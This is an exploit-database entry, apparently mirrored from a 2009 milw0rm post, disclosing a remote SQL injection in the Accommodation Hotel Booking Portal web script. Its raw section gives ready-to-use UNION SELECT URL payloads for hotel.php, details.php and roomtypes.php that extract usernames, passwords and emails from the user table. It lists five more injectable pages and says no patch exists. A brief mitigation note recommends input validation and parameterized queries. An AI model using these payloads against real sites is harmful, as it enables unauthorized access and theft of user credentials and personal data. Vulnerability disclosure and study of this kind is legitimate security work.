Remote SQL Injection Vulnerability ( hotel.php hotel_id )

vendor:

Accommodation Hotel Booking Portal

by:

Mr.SQL

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Accommodation Hotel Booking Portal

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Remote SQL Injection Vulnerability ( hotel.php hotel_id )

The Accommodation Hotel Booking Portal is vulnerable to a remote SQL injection vulnerability. Attackers can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by appending malicious SQL queries to the vulnerable parameter 'hotel_id' in the URL. For example, www.TraGeT.CoM/hotel.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability ( hotel.php hotel_id )
##
## Accommodation Hotel Booking Portal
##
## http://www.tourismscripts.com
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.55a.NeT
##
## Email  : SQL@Hotmail.iT
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/hotel.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
## www.TraGeT.CoM/details.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
## www.TraGeT.CoM/roomtypes.php?hotel_id=1'+UNION+SELECT+0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0+FROM+user/*
## www.TraGeT.CoM/photos.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/map.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/weather.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/reviews.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/book.php?hotel_id=1' << SQL >>
##
########################
########################

# milw0rm.com [2009-09-10]